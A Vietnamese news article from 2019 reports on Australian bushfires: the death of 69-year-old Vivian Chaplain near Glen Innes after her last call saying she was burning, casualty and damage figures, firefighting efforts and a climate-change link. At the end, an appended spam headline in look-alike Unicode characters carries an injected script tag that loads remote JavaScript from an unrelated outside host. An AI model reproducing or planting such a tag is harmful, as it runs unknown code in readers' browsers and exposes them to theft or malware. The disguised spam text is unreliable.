RSS

Cháy rừng ở Úc: Lời kêu cứu đau thương 'Mẹ đang cháy con ơi'

22:00 11/11/2019

Các vụ cháy rừng những ngày qua đã “xé toạc” các bang Queensland, New South Wales và Tây Úc, gây ra thảm họa kinh hoàng, cướp đi sinh mạng của ít nhất 3 người, phá hủy ít nhất 150 ngôi nhà và làm cho hơn 1.300 người phải đi lánh nạn.

Đài phát thanh truyền hình Sky News kể lại lời nói đau lòng của bà Vivian Chaplain 69 tuổi, một trong ba người thiệt mạng do cháy rừng ở New South Wales – bang đông dân nhất nước Úc. Không còn đường lui khi lửa vây quanh nhà, bà Vivian Chaplain nói với con dâu qua điện thoại: “Mẹ đang  cháy con ơi”.

Cô con dâu Chrystal Harwood ngậm ngùi nói: “Tôi là người cuối cùng nói chuyện với bà. Mẹ khi đó hoàn toàn hoảng loạn. Bà gào lên rằng “Mẹ đang cháy! Có lửa ở khắp mọi nơi!”. Trước khi tôi kịp kêu bà cố thoát ra ngoài thì điện thoại bị ngắt. Tôi đã thử gọi lại vô số lần nhưng không được. Mẹ là một người phụ nữ mạnh mẽ và đáng yêu” – Chrystal Harwood nhớ lại chuyện đau thương hôm 8-11.

Lời kêu cứu đau thương Mẹ đang cháy con ơi! - Ảnh 1.

Bà Vivian Chaplain 69 tuổi, một trong ba người thiệt mạng do cháy rừng ở New South Wales (ảnh nhỏ). Ảnh: SMH

Harwood kêu gọi khẩn thiết nhờ cứu giúp trên phương tiện truyền thông xã hội. “Mẹ tôi Vivian đang ở một mình. Ai đó có thể giúp đỡ, bất cứ ai, làm ơn… RFS (Sở Cứu hỏa vùng nông thôn của bang New South Wales) không thể đến chỗ bà ấy. Đường đi là đoạn đường hầm lửa” – cô viết.

Sở cứu hỏa cho biết bà Vivian Chaplain đã chết trong bệnh viện sau khi lính cứu hỏa tìm thấy bà bất tỉnh với những vết bỏng nghiêm trọng gần thị trấn Glen Innes, theo báo The Guardian. Đại diện RFS nói với đài ABC News (Úc) rằng theo các báo cáo ban đầu, diện tích bỏng của bà Vivian Chaplain lên tới 40 đến 50%.

Lời kêu cứu đau thương Mẹ đang cháy con ơi! - Ảnh 2.

Hàng trăm ngàn hecta rừng tại các bang Queensland, New South Wales và Tây Australia đang bị chìm trong các đám cháy. Ảnh: REUTERS

Lời kêu cứu đau thương Mẹ đang cháy con ơi! - Ảnh 3.

Các nhân viên cứu hỏa chiến đấu suốt ngày đêm trên các khu rừng cháy với máy bay trực thăng ném bom nước được triển khai để dập tắt ngọn lửa. Ảnh: REUTERS

Lính cứu hỏa tìm thấy một thi thể khác vào sáng 9-11 trong một chiếc xe bị cháy gần Glenn Innes. Cảnh sát New South Wales cho biết một thi thể được tìm thấy trong một tòa nhà bị cháy ở sông Johns, gần Taree – thị trấn cách Sydney khoảng 300 km về phía Bắc. Khám nghiệm tử thi sẽ xác định liệu nạn nhân có phải là người phụ nữ 63 tuổi sở hữu ngôi nhà hay không.

Hơn 35 người bị thương, trong đó có 16 lính cứu hỏa. 1.500 lính cứu hỏa ra quân chiến đấu với cháy rừng không thể kiểm soát khắp New South Wales. RFS cảnh báo mọi người nên tự chuẩn bị cho mình trước các vụ cháy rừng, giữa lúc tình trạng khô hạn kéo dài cộng với thời tiết nóng nực, có nơi lên đến 40 độ C, khiến khu rừng bùng cháy và việc chữa cháy trở nên khó khăn. Gió thổi mạnh và liên tục đổi hướng khiến cho các đám cháy lan nhanh và càng khó kiểm soát.

Lời kêu cứu đau thương Mẹ đang cháy con ơi! - Ảnh 4.

Một đám cháy bùng cháy ở phía Bắc Glen Innes vào ngày 10-11. Ảnh: SMH

Lời kêu cứu đau thương Mẹ đang cháy con ơi! - Ảnh 5.

Cháy rừng ở Rainbow Flat hôm 8-11. Ảnh: SMH

Lời kêu cứu đau thương Mẹ đang cháy con ơi! - Ảnh 6.

Lính cứu hỏa chiến đấu với đám cháy rừng trên Lakes Way ngày 10-11. Ảnh: SMH

Thủ tướng Scott Morrison hôm 9-11 cho biết quân đội có thể được chi viện cho 1.300 lính cứu hỏa hiện đang giải quyết khoảng 100 vụ cháy. Hàng trăm người dân tình nguyện giúp đỡ các khu vực bị ảnh hưởng ở Queensland và New South Wales.

Hiện các nhà chức trách New South Wales đang lo sợ tình hình vào ngày 12-11. Lực lượng cứu hỏa bang này cảnh báo các điều kiện tồi tệ hơn sẽ đến vào ngày này đó và xem ngày 12-11 là “một ngày nguy hiểm”. Cục Khí tượng dự báo rằng nhiều khu vực ở New South Wales sẽ đạt nhiệt độ hơn 30 độ C và gió giật 46 km/giờ vào ngày hôm đó.

Đài BBC đặt ra câu hỏi liệu những gì xảy ra ở Úc có liên quan đến biến đổi khí hậu không? Câu trả lờ là có. Theo các nhà khoa học, đợt nắng nóng, cháy rừng ở Úc có nguy cơ ngày càng kéo dài hơn và dữ dội hơn do biến đổi khí hậu. Các nhà chức trách xác nhận năm 2018 và 2017 là hai năm nóng thứ ba và thứ tư từng được ghi nhận ở nước Úc.

Theo NLĐ

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.